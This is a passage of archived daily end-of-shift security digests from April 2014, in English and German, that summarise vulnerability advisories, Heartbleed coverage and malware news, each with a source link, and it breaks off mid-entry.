*** OSISoft PI Interface for DNP3 Improper Input Validation *** --------------------------------------------- OVERVIEWAdam Crain of Automatak and Chris Sistrunk, Sr. Consultant for Mandiant, have identified an improper input validation vulnerability in the OSIsoft PI Interface for DNP3 product. OSIsoft has produced an update that mitigates this vulnerability. OSIsoft and Automatak have tested the new version to validate that it resolves the vulnerabilityThis vulnerability can be remotely exploited. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-098-01 *** WellinTech KingSCADA Stack-Based Buffer Overflow *** --------------------------------------------- An anonymous researcher working with HP’s Zero Day Initiative has identified a stack-based buffer overflow in the WellinTech KingSCADA Stack. WellinTech has produced a patch that mitigates this vulnerability.This vulnerability could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-098-02 *** OpenSSL Heartbeat Extension Vulnerability in Multiple Cisco Products *** --------------------------------------------- Multiple Cisco products incorporate a version of the OpenSSL package affected by a vulnerability that could allow an unauthenticated, remote attacker to retrieve memory in chunks of 64 kilobytes from a connected client or server. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** The April 2014 Security Updates *** --------------------------------------------- Today, we release four bulletins to address 11 CVEs in Microsoft Windows, Internet Explorer and Microsoft Office. --------------------------------------------- http://blogs.technet.com/b/msrc/archive/2014/04/08/the-april-2014-security-… *** Heartbleed SSL-GAU: Neue Zertifikate braucht das Land *** --------------------------------------------- Ein simples Update reicht nicht: Nach der OpenSSL-Lücke müssen Serverbetreiber Zertifikate austauschen. Bei manchen CAs geht das kostenlos, andere Zertifikats-Anbieter und Hoster belassen es bei Warnungen. --------------------------------------------- http://www.heise.de/newsticker/meldung/Heartbleed-SSL-GAU-Neue-Zertifikate-… *** Juniper SSL VPN (IVEOS) OpenSSL TLS Heartbeat Information Disclosure Vulnerability *** --------------------------------------------- Juniper has acknowledged a vulnerability in Juniper SSL VPN (IVEOS), which can be exploited by malicious people to disclose potentially sensitive information. --------------------------------------------- https://secunia.com/advisories/57758 *** Bugtraq: CVE-2014-0160 mitigation using iptables *** --------------------------------------------- Following up on the CVE-2014-0160 vulnerability, heartbleed. We've created some iptables rules to block all heartbeat queries using the very powerful u32 module. The rules allow you to mitigate systems that can't yet be patched by blocking ALL the heartbeat handshakes. We also like the capability to log external scanners :) --------------------------------------------- http://www.securityfocus.com/archive/1/531779 *** Heartbleed vendor notifications, (Wed, Apr 9th) *** --------------------------------------------- As people are running around having an entertaining day we thought it might be a good idea to keep track of the various vendor notifications. Id like to start a list here and either via comments or sending it let us know of vendor notifications relating to this issue. Please provide comments to the original article relating to the vulnerability itself, and use this post to only provide links to vendor notifications rather than articles etc about the issue. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17929&rss *** Bugtraq: SQL Injection in Orbit Open Ad Server *** --------------------------------------------- High-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over the vulnerable website. --------------------------------------------- http://www.securityfocus.com/archive/1/531781 *** Office für Mac: Update stopft kritische Lücke *** --------------------------------------------- Mit einer neuen OS-X-Version von Office 2011 hat Microsoft die RTF-Schwachstelle in Word beseitigt. Die Aktualisierung soll verschiedene Probleme in Outlook, Excel und Word beheben. --------------------------------------------- http://www.heise.de/security/meldung/Office-fuer-Mac-Update-stopft-kritisch… *** Sophos Web Appliance Security Bypass Vulnerability *** --------------------------------------------- A vulnerability has been reported in Sophos Web Appliance, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to an unspecified error related to the "Change Password" dialog box and can be exploited to change the administrative password. --------------------------------------------- https://secunia.com/advisories/57706 *** Security Notice-Statement on OpenSSL Heartbeat Extension Vulnerability *** --------------------------------------------- Huawei has noticed information regarding OpenSSL heartbeat extension security vulnerability and immediately launched a thorough investigation. The investigation is still ongoing. Huawei PSIRT will keep updating the SN and will provide conclusions as soon as possible. Please stay tuned. --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…

1 0

Tageszusammenfassung - Dienstag 8-04-2014
by Daily end-of-shift report 08 Apr '14

08 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 07-04-2014 18:00 − Dienstag 08-04-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** Der GAU für Verschlüsselung im Web: Horror-Bug in OpenSSL *** --------------------------------------------- Ein äußerst schwerwiegender Programmierfehler gefährdet offenbar Verschlüsselung, Schlüssel und Daten der mit OpenSSL gesicherten Verbindungen im Internet. Angesichts der Verbreitung der OpenSource-Biliothek eine ziemliche Katastrophe. --------------------------------------------- http://www.heise.de/security/meldung/Der-GAU-fuer-Verschluesselung-im-Web-H… *** VU#568252: Websense Triton Unified Security Center 7.7.3 information disclosure vulnerability *** --------------------------------------------- Vulnerability Note VU#568252 Websense Triton Unified Security Center 7.7.3 information disclosure vulnerability Original Release date: 07 Apr 2014 | Last revised: 07 Apr 2014 Overview Websense Triton Unified Security Center 7.7.3 and possibly earlier versions contains an information disclosure vulnerability which could allow an authenticated attacker to view stored credentials of a possibly higher privileged user. Description CWE-200: Information ExposureWhen logged into the Websense Triton --------------------------------------------- http://www.kb.cert.org/vuls/id/568252 *** Energieversorger testet Sicherheit – und fällt durch *** --------------------------------------------- In „Stirb langsam 4.0“ fahren Cyber-Gauner übers Internet die komplette Stromversorgung im Osten der USA herunter. Ein unrealistisches Szenario? Nicht ganz ... --------------------------------------------- http://www.heise.de/newsticker/meldung/Energieversorger-testet-Sicherheit-u… *** The Muddy Waters of XP End-of-Life and Public Disclosures *** --------------------------------------------- Security researchers who have privately disclosed Windows XP vulnerabilities to Microsoft may never see patches for their bugs with XPs end of life date at hand. Will there be a rash of public disclosures? --------------------------------------------- http://threatpost.com/the-muddy-waters-of-xp-end-of-life-and-public-disclos… *** 2013 wurden Daten von über 500 Millionen Nutzern geklaut *** --------------------------------------------- Daten von mehr als einer halben Milliarde Internet-Nutzer sind im vergangenen Jahr nach Berechnung von IT-Sicherheitsexperten bei Online-Angriffen gestohlen worden. --------------------------------------------- http://futurezone.at/digital-life/2013-wurden-daten-von-ueber-500-millionen… *** Hintergrund: ct-Fritzbox-Test spürt verborgene Geräte auf *** --------------------------------------------- Manche Nutzer des Fritzbox-Tests erhalten unerwartete Ergebnisse. Nicht selten sind WLAN-APs, Repeater oder andere AVM-Geräte die Ursache. Darüber hinaus gibt es auch einige Fehlerquellen, die einen händischen Test erforderlich machen können. --------------------------------------------- http://www.heise.de/newsticker/meldung/Hintergrund-c-t-Fritzbox-Test-spuert… *** The 2013 Internet Security Threat Report: Year of the Mega Data Breach *** --------------------------------------------- Once again, it’s time to reveal the latest findings from our Internet Security Threat Report (ISTR), which looks at the current state of the threat landscape, based on our research and analysis from the past year. Key trends from this year’s report include the large increase in data breaches and targeted attacks, the evolution of mobile malware and ransomware, and the potential threat posed by the Internet of Things. --------------------------------------------- http://www.symantec.com/connect/blogs/2013-internet-security-threat-report-… *** Cacti Multiple Vulnerabilities *** --------------------------------------------- Some vulnerabilities have been reported in Cacti, which can be exploited by malicious users to conduct script insertion and SQL injection attacks and compromise a vulnerable system. * CVE-2014-2326 * CVE-2014-2708 * CVE-2014-2709 --------------------------------------------- https://secunia.com/advisories/57647 *** Open-Xchange Email Autoconfiguration Information Disclosure Weakness *** --------------------------------------------- A weakness has been reported in Open-Xchange, which can be exploited by malicious people to disclose certain sensitive information. The weakness is caused due to the application communicating certain information via parameters of a GET request when using the email autoconfiguration, which can be exploited to disclose the account password. --------------------------------------------- https://secunia.com/advisories/57654 *** VU#345337: J2k-Codec contains multiple exploitable vulnerabilities *** --------------------------------------------- Vulnerability Note VU#345337 J2k-Codec contains multiple exploitable vulnerabilities Original Release date: 08 Apr 2014 | Last revised: 08 Apr 2014 Overview J2k-Codec contains multiple exploitable vulnerabilities, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. Description J2k-Codec is a JPEG 2000 decoding library for Windows. J2k-Codec contains multiple exploitable exploitable vulnerabilities that can lead to arbitrary code execution. --------------------------------------------- http://www.kb.cert.org/vuls/id/345337

1 0

Tageszusammenfassung - Montag 7-04-2014
by Daily end-of-shift report 07 Apr '14

07 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 04-04-2014 18:00 − Montag 07-04-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** BSI-Webseite mit Prüfung ob die eigene Emailadresse im aktuellen Fall betroffen ist *** --------------------------------------------- Im Rahmen eines laufenden Ermittlungsverfahrens der Staatsanwaltschaft Verden (Aller) ist erneut ein Fall von großflächigem Identitätsdiebstahl aufgedeckt worden. ... Diese Webseite bietet eine Überprüfungsmöglichkeit, ob Sie von dem Identitätsdiebstahl betroffen sind. --------------------------------------------- https://www.sicherheitstest.bsi.de/ *** VirusShield: Nur ein Logo - sonst nichts *** --------------------------------------------- Die App VirusShield für Android erreichte innerhalb kürzester Zeit enorme Verkaufszahlen. Jedoch: Die App tut überhaupt nichts. (Google, Virenscanner) --------------------------------------------- http://www.golem.de/news/virusshield-nur-ein-logo-sonst-nichts-1404-105677-… *** Hash-Funktion: Entwurf für SHA-3-Standard liegt vor *** --------------------------------------------- Die US-Behörde Nist hat einen Entwurf für die Standardisierung der Hashfunktion SHA-3 vorgelegt. Drei Monate lang besteht nun die Möglichkeit, diesen zu kommentieren. (Technologie, Verschlüsselung) --------------------------------------------- http://www.golem.de/news/hash-funktion-entwurf-fuer-sha-3-standard-liegt-vo… *** Those strange e-mails with URLs in them can lead to Android malware, (Sat, Apr 5th) *** --------------------------------------------- Youve probably gotten a few of these e-mails over the last few months (I saw the first one of this latest kind in early Feb), we got one to the handlers list earlier this week which prompted this diary. They seem pretty innocuous, they have little or no text and a URL like the one shown below. Note: the above link doesnt lead to the malware anymore, so I didnt obscure it. Most seem to be sent from Yahoo! (or Yahoo!-related e-mail addresses), so they may be coming from addresses that were --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17909&rss *** XMPP-Layer Compression Uncontrolled Resource Consumption *** --------------------------------------------- Topic: XMPP-Layer Compression Uncontrolled Resource Consumption Risk: Medium Text:Uncontrolled Resource Consumption with XMPP-Layer Compression Original Release Date: 2014-04-04 Last Updated: 2014-04-04 ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014040034 *** Fake Voting Campaign Steals Facebook Users’ Identities *** --------------------------------------------- Contributor: Parag SawantPhishers continuously come up with various plans to enhance their chances of harvesting users’ sensitive information. Symantec recently observed a phishing campaign where data is collected through a fake voting site which asks users to decide whether boys or girls are greater.read more --------------------------------------------- http://www.symantec.com/connect/blogs/fake-voting-campaign-steals-facebook-… *** Advice for Enterprises in 2014: Protect Your Core Data *** --------------------------------------------- Some companies may think – “if it can happen to a spy agency, there’s nothing we could do. We should just give up and not protect our data anymore.” Others may say: “let’s build a bigger wall around our data.” Both approaches are incorrect. Obviously, you have to protect your data. However, neither can enterprises just try and protect everything with the same rigor. ... What an enterprise needs to focus on is what really needs to be protected. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/advice-for-enter… *** Microsoft spells out new rules for exiling .EXEs *** --------------------------------------------- Microsoft has updated the methodology it uses to define adware, a move designed to make it clearer just what the company considers worthy for removal by its malware tools. ... The kinds of “unwanted behaviours” that Redmond is looking for will be familiar to anyone whos been burned by mistakenly clicking on the link, with lack of user choice or control topping the list. --------------------------------------------- http://www.theregister.co.uk/2014/04/07/microsoft_puts_adware_in_the_crossh… *** Netgear schließt Hintertür in Modemrouter DGN1000 *** --------------------------------------------- Die Firma hat ein Firmware-Update veröffentlicht, das die Hintertür auf Port 32764 des DSL-Modemrouters schließen soll. Über die Lücke können Angreifer die Passwörter der Geräte abgreifen. --------------------------------------------- http://www.heise.de/security/meldung/Netgear-schliesst-Hintertuer-in-Modemr… *** RSA Data Loss Prevention Security Bypass Security Issue *** --------------------------------------------- A security issue has been reported in RSA Data Loss Prevent, which can be exploited by malicious users to bypass certain security restrictions. The security issue is caused due an error within the session management and can be exploited to access otherwise restricted content. --------------------------------------------- https://secunia.com/advisories/57464

1 0

Tageszusammenfassung - Freitag 4-04-2014
by Daily end-of-shift report 04 Apr '14

04 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 03-04-2014 18:00 − Freitag 04-04-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** SMBEXEC Rapid Post Exploitation Tool *** --------------------------------------------- Smbexec is a tool that you can use for penetration testing domain controllers, the program allows to run post exploitation for domain accounts and expand the access to targeted network. this makes pentester have a full access without any privilege requirement. --------------------------------------------- http://www.sectechno.com/2014/03/30/smbexec-rapid-post-exploitation-tool/ *** IBM Security Bulletin: Fixes available for Cross Site Scripting vulnerabilities in IBM WebSphere Portal (CVE-2014-0828 and CVE-2014-0901) *** --------------------------------------------- Fixes are available for Cross Site Scripting vulnerabilities in IBM WebSphere Portal. CVE(s): CVE-2014-0828 and CVE-2014-0901 --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** IBM Security Bulletin: WebSphere Partner Gateway Advanced/Enterprise is affected by vulnerabilities that exist in the IBM SDK for Java (CVE-2014-0411) *** --------------------------------------------- WebSphere Partner Gateway Advanced/Enterprise uses IBM SDK for Java that is based on Oracle JDK . Oracle has released January 2014 critical patch updates (CPU) which contain security vulnerability fixes. The IBM SDK for Java has been updated to incorporate these fixes. CVE(s): CVE-2014-0411 --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** OTRS Help Desk clickjacking *** --------------------------------------------- OTRS Help Desk could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could send a specially-crafted HTTP request to hijack the victim's click actions or launch other client-side browser attacks. --------------------------------------------- http://xforce.iss.net/xforce/xfdb/92233 *** iOS 7.1 bug enables iCloud account deletion, disabling Find My iPhone, without password *** --------------------------------------------- A bug demonstrated by a YouTube user on Wednesday may enable a thief to delete an iCloud account, disable Find My iPhone, and ultimately restore the device, without the need of a password. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/kToL7uqo4FE/ *** Your files held hostage by CryptoDefense? Dont pay up! The decryption key is on your hard drive *** --------------------------------------------- Blunder discovered in latest ransomware infecting PCs A basic rookie programming error has crippled an otherwise advanced piece of ransomware dubbed CryptoDefense – but the crap coders are still pulling in more than $30,000 a month from unwary punters.… --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/04/03/cryptodefen… *** Advance Notification Service for the April 2014 Security Bulletin Release *** --------------------------------------------- Today we provide advance notification for the release of four bulletins, two rated Critical and two rated Important in severity. These updates address issues in Microsoft Windows, Office and Internet Explorer. The update provided through MS14-017 fully addresses the Microsoft Word issue first described in Security Advisory 2953095. This advisory also included a Fix it to disable opening rich-text format (RTF) files within Microsoft Word. Once the security update is applied, you should disable --------------------------------------------- http://blogs.technet.com/b/msrc/archive/2014/04/03/advance-notification-ser… *** Schneider Electric OPC Factory Server Buffer Overflow *** --------------------------------------------- OVERVIEW Researcher Wei Gao, formerly of IXIA, has identified a buffer overflow vulnerability in the Schneider Electric OPC Factory Server (OFS) application. Schneider Electric has produced a patch that mitigates this vulnerability. Wei Gao has tested the patch to validate that it resolves the vulnerability.This vulnerability could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-093-01 *** Adware: A new approach *** --------------------------------------------- Here at the Microsoft Malware Protection Center (MMPC) we understand advertising is part of the modern computing experience. However, we want to give our customers choice and control regarding what happens with their computers. To that end we have recently undergone some changes to both the criteria we use to classify a program as adware and how we remediate it when we find it. This blog will help explain the new criteria and how it affects some programs. Our updated objective criteria --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2014/04/03/adware-a-new-approach.as… *** Zeus malware found with valid digital certificate *** --------------------------------------------- A recently discovered variant of the Zeus banking Trojan was found to use a legitimate digital signature to avoid detection from Web browsers and anti-virus systems.Security vendor Comodo reported Thursday finding the variant 200 times while monitoring and analyzing data from users of its Internet security system. The variant includes the digital signature, a rootkit and a data-stealing malware component."Malware with a valid digital signature is an extremely dangerous situation," the --------------------------------------------- http://www.csoonline.com/article/2140021/data-protection/zeus-malware-found… *** Linux-PAM "pam_timestamp" Module Two Directory Traversal Vulnerabilities *** --------------------------------------------- Two vulnerabilities have been reported in Linux-PAM, which can be exploited by malicious people to bypass certain security restrictions. --------------------------------------------- https://secunia.com/advisories/57317 *** E-Mail-Konten gehackt: BSI will Millionen betroffene Nutzer informieren *** --------------------------------------------- Behörden und Provider wollen die Nutzer über den Hack von E-Mail-Konten informieren. Wie und wann die Aktion starten soll, steht aber noch nicht fest. (Spam, Computer) --------------------------------------------- http://www.golem.de/news/e-mail-konten-gehackt-bsi-will-millionen-betroffen… *** TLS-Bibliotheken: Fehler finden mit fehlerhaften Zertifikaten *** --------------------------------------------- Mit Hilfe von fehlerhaften X.509-Zertifikaten haben Forscher zahlreiche zum Teil sicherheitskritische Bugs in TLS-Bibliotheken gefunden. Erneut wurde dabei eine gravierende Sicherheitslücke in GnuTLS entdeckt. (Browser, Technologie) --------------------------------------------- http://www.golem.de/news/tls-bibliotheken-fehler-finden-mit-fehlerhaften-ze… *** Cisco Emergency Responder - Multiple vulnerabilities *** --------------------------------------------- Cross-Site Scripting - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… Cross-Site Request Forgery - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… Open Redirect - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… Dynamic Content Modification - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** PHP 5.4.27 released, (Fri, Apr 4th) *** --------------------------------------------- A new version of PHP has been released. The announcement comments: "The PHP development team announces the immediate availability of PHP 5.4.27. 6 bugs were fixed in this release, including CVE-2013-7345 in fileinfo module." --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17901&rss *** April 8th: Not Just About XP *** --------------------------------------------- April 8th will soon be upon us! And that means…Countdown Clocks…the end of extended support for Windows XP. But not just XP. Office 2003 is also reaching its life.And thats especially important to know because theres currently an Office vulnerability in the wild.Microsoft released its Security Bulletin Advance Notification yesterday: And the good news is: a patch for the Word vulnerability appears to be in the pipeline. --------------------------------------------- http://www.f-secure.com/weblog/archives/00002690.html *** Dealing with Disaster - A Short Malware Incident Response, (Fri, Apr 4th) *** --------------------------------------------- I had a client call me recently with a full on service outage - his servers werent reachable, his VOIP phones were giving him more static than voice, and his Exchange server wasnt sending or receiving mail - pretty much everything was offline. I VPNd in (I was not onsite) and started with the firewall, because things were bad enough thats all I could initially get to from a VPN session. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17905&rss *** Cisco IOS XR Software ICMPv6 Redirect Vulnerability *** --------------------------------------------- A vulnerability in Internet Control Message Protocol version 6 (ICMPv6) processing of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to affect IPv4 and IPv6 traffic passing through an affected device. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Researchers Uncover Interesting Browser-Based Botnet *** --------------------------------------------- Security researchers discovered an odd DDoS attack against several sites recently that relied on a persistent cross-site scripting vulnerability in a major video Web site and hijacked users’ browsers in order to flood the site with traffic. The attack on the unnamed site involved the use of injected Javascript on the site which would execute in […] --------------------------------------------- http://threatpost.com/researchers-uncover-interesting-browser-based-botnet/…

1 0

Tageszusammenfassung - Donnerstag 3-04-2014
by Daily end-of-shift report 03 Apr '14

03 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 02-04-2014 18:00 − Donnerstag 03-04-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** Researchers Divulge 30 Oracle Java Cloud Service Bugs *** --------------------------------------------- Upset with the vulnerability handling process at Oracle, researchers yesterday disclosed over two dozen issues with the company’s Java Cloud Service platform. --------------------------------------------- http://threatpost.com/researchers-divulge-30-oracle-java-cloud-service-bugs… *** Ad Violations: Why Search Engines Won’t Display Your Site If it’s Infected With Malware *** --------------------------------------------- As your site’s webmaster, have you ever seen an e-mail from Google like this: Hello, We wanted to alert you that one of your sites violates our advertising policies. Therefore, we won’t be able to run any of your ads that link to that site, and any new ads pointing to that site will alsoRead More --------------------------------------------- http://feedproxy.google.com/~r/sucuri/blog/~3/kz7JGX2ydIU/ad-violations-why… *** IBM Lotus Web Content Managemen cross-site scripting *** --------------------------------------------- IBM Lotus Web Content Management is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. --------------------------------------------- http://xforce.iss.net/xforce/xfdb/90566 *** Watching the watchers, (Thu, Apr 3rd) *** --------------------------------------------- A lot of companies today have various IDS and IPS devices implemented in their internal network (especially if you must be compliant with PCI DSS, for example). So these devices get implemented to monitor various traffic at various interfaces/perimeters in a company, but the question I got asked is how can we be sure that the IDS/IPS is doing its job? Obviously, some simple monitoring should be in place – this typically consists of pinging the device or collecting various counters such --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17895&rss *** Macro-Enabled Files Used as Infection Vectors (Again) *** --------------------------------------------- Macro-based attacks were popular in the early 2000s, but they gained much notoriety with the much publicized coverage of the Melissa virus. However, macro-based attacks soon began to drop off the radar. One major reason for this would be the security measures implemented by Microsoft to address malicious macro files. Another probable reason would also […]Post from: Trendlabs Security Intelligence Blog - by Trend MicroMacro-Enabled Files Used as Infection Vectors (Again) --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/1X49GtDdVuU/ *** New Check_MK stable release 1.2.4p1 *** --------------------------------------------- The most important changes are security patches for two CVEs (CVE-2014-2330 and CVE-2014-2331) which have been published on 2014-03-24 and 2014-03-28 on the bugtraq mailinglist. The mail from 2014-03-24 contained wrong information on the not-fixed issues, which had been corrected with the mail from 2014-03-28. All of the reported security related issues are fixed with this release. --------------------------------------------- http://lists.mathias-kettner.de/pipermail/checkmk-announce/2014-April/00008… *** A Series of Introductory Malware Analysis Webcasts *** --------------------------------------------- If you are looking to get started with malware analysis, tune into the webcast series I created to illustrate key tools and techniques for examining malicious software. --------------------------------------------- http://blog.zeltser.com/post/80874760857/introductory-malware-analysis-webc… *** Twelve sources of global cyber attack maps *** --------------------------------------------- 1 - Cyber Warfare Real Time Map by Kaspersky 2 - Top Daily DDoS Attacks Worldwide by Google 3 - Security Tachometer by Deutche Telekom 4 - Cyberfeed Live Botnet Map by AnubisNetworks 5 - Real-time Web Monitor by Akamai 6 - IpViking Live Map by Norse 7 - Honeypots from the Honeynet Project 8 - Global Activity Maps by Arbor 9 - Global Botnet Threat Activity Map by Trend Micro 10 - DDoS Attacks by ShadowServer 11 - Internet Malicious Activity Maps by TeamCymru 12 - Globe and WorldMap by F-Secure --------------------------------------------- http://sseguranca.blogspot.com.br/2014/03/ten-sources-of-global-cyber-attac… *** SNMPCheck - Enumerate the SNMP devices *** --------------------------------------------- Like to snmpwalk, snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring. --------------------------------------------- http://hack-tools.blackploit.com/2014/04/snmpcheck-enumerate-snmp-devices.h… *** The Right Stuff: Staffing Your Corporate SOC *** --------------------------------------------- In my experience, passing a certification exam or getting a degree simply shows that a potential employee is a good test-taker or has the determination to plow through a degree program. Neither substitutes for the wealth of experience SOC analysts need to be good at their jobs. Don’t get me wrong. Certification programs can be an important piece of a cyber-security practitioner’s complete education. --------------------------------------------- http://www.darkreading.com/operations/careers-and-people/the-right-stuff-st… *** FortiBalancer SSH Access Security Bypass Vulnerability *** --------------------------------------------- A vulnerability has been reported in FortiBalancer, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to a configuration error related to SSH access and can be exploited to gain otherwise restricted SSH access. The vulnerability is reported in FortiBalancer 400, 1000, 2000, and 3000. --------------------------------------------- https://secunia.com/advisories/57673 *** Sicherheit: Fahnder entdecken Datensatz mit 18 Millionen Mailkonten *** --------------------------------------------- Schon wieder ist eine Datei mit Millionen gehackten Mailkonten sichergestellt worden. Alle großen deutschen E-Mail-Provider und mehrere internationale Anbieter sollen betroffen sein. (Spam, Computer) --------------------------------------------- http://www.golem.de/news/sicherheit-fahnder-entdecken-datensatz-mit-18-mill… *** Tool Estimates Incident Response Cost for Businesses *** --------------------------------------------- A new tool called CyberTab will help businesses estimate the cost of real and potential cyberattacks, and the amount a company could possibly save by investing in preventative measures and technologies. --------------------------------------------- http://threatpost.com/tool-estimates-incident-response-cost-for-businesses/… *** Bugtraq: [softScheck] Denial of Service in Microsoft Office 2007-2013 *** --------------------------------------------- softScheck has identified a Denial of Service vulnerability in Microsoft Outlook 2007-2013. A remote attacker can send a plaintext email containing an XML bomb as the message body, causing Outlook to freeze while opening the email. This forces the user to terminate the Outlook process. In the default Outlook configuration, in which email contents are displayed in a reading pane in the main window, the impact is more severe: Outlook will freeze while starting and will not be able to start anymore, since it tries to open and display the email during startup. To resolve the issue, Outlook needs to be started in safe mode and the email needs to be deleted. --------------------------------------------- http://www.securityfocus.com/archive/1/531722 *** DFRWS EU 2014 Annual Conference *** --------------------------------------------- DFRWS has a long history of being the foremost digital forensics research venue and has decided to hold a sister conference to bring the same opportunities to Europe. The first annual DFRWS EU conference will be held from May 7 to 9, 2014 in Amsterdam, NL. --------------------------------------------- http://www.dfrws.org/2014eu/ *** Cisco IOS Software IKE Main Mode Vulnerability *** --------------------------------------------- A vulnerability in the Internet Key Exchange (IKE) module of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to delete established security associations on an affected device. The vulnerability is due to improper handling of rogue IKE Main Mode packets. An attacker could exploit this vulnerability by sending a crafted IKE Main Mode packet to an affected device. An exploit could allow the attacker to cause valid, established IKE security associations on an affected device to drop. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…

1 0

Tageszusammenfassung - Mittwoch 2-04-2014
by Daily end-of-shift report 02 Apr '14

02 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 01-04-2014 18:00 − Mittwoch 02-04-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** Whitehat Securitys Aviator browser is coming to Windows *** --------------------------------------------- I have had the privilege of knowing Jeremiah Grossman, the iCEO of Whitehat Security, for many years now. He has spoken on many occasions about web security and specifically web browser security or rather, the lack thereof. I recall at one point asking him, "OK, what do you use as a web browser?" He paused, smiled and said, "My own". That Cheshire cat response played over again in my head when Whitehat Security released their browser offering called Aviator. This is a --------------------------------------------- http://www.csoonline.com/article/2136258/application-security/whitehat-secu… *** 110,000 Wordpress Databases Exposed *** --------------------------------------------- For years now Ive been writing my various blog posts and I have used many different kinds of CMS platforms right back to posting using VI back in the 90s. My favourite platform that Ive used to create content has been Wordpress by far. I can almost here the security folks cringe. Yes, it is a massive headache to lockdown. But, I fight on as the user experience makes the pain worthwhile. OK, maybe worthwhile isnt the correct word. This is a platform that has had a long history of security --------------------------------------------- http://www.csoonline.com/article/2136246/application-security/110-000-wordp… *** "ct wissen Windows": So meistern Sie das Support-Ende von Windows XP *** --------------------------------------------- Pünktlich zum Support-Ende von Windows XP veröffentlichen wir mit dem "ct wissen Windows" ein Handbuch für alle Betroffenen. Es erläutert nicht nur, was das Support-Ende genau bedeutet, sondern liefert vor allem Praxis-Anleitungen. --------------------------------------------- http://www.heise.de/newsticker/meldung/c-t-wissen-Windows-So-meistern-Sie-d… *** Call for packets udp/137 broadcast, (Tue, Apr 1st) *** --------------------------------------------- One of our readers have reported that he has seen a broadcast traffic to udp/137 . He suspected that the traffic cause a denial of service to some of his systems. If you have seen such traffic and you would like to share some packets we would appreciate that. (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17887&rss *** AlienVault Open Source SIM date_from SQL injection *** --------------------------------------------- AlienVault Open Source SIM (OSSIM) is vulnerable to SQL injection. A remote authenticated attacker could send specially-crafted SQL statements to the ISO27001Bar1.php script using the date_from parameter, which could allow the attacker to view, add, modify or delete information in the back-end database. --------------------------------------------- http://xforce.iss.net/xforce/xfdb/92172 *** Password bug let me see shoppers credit cards in eBay ProStores, claims infosec bod *** --------------------------------------------- Online bazaar fixes store account hijack flaw, were told A serious vulnerability that potentially allowed shoplifters to empty eBay ProStores shops and swipe customer credit cards has been fixed according to the security researcher who says he found the hole. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/04/01/ebay_stores… *** Fake Google apps removed from Window Phone Store by Microsoft *** --------------------------------------------- Five phony Google apps appeared in the app store, each with a $1.99 price tag, before being removed by the company. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/fXb73Il-oZg/ *** Hack of Boxee.tv exposes password data, messages for 158,000 users *** --------------------------------------------- Huge file circulating online contains e-mail addresses, full message histories. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/B676MRE54C8/ *** IT Analyst Highlights 6 IT Security 'Worst Practices' *** --------------------------------------------- In a new Network World article, prominent IT analyst and researcher Linda Musthaler is highlighting 6 'worst practices' that companies commit on their way to undermining, destabilizing, or just plain wrecking their IT security efforts: Failing to stay up-to-date with the latest technologies and techniques. Neglecting to take a comprehensive network security approach that also [...]The post IT Analyst Highlights 6 IT Security 'Worst Practices' appeared first on Seculert --------------------------------------------- http://www.seculert.com/blog/2014/04/it-analyst-highlights-6-it-security-wo… *** HP integrated Lights Out (iLO) IPMI Protocol Flaw Lets 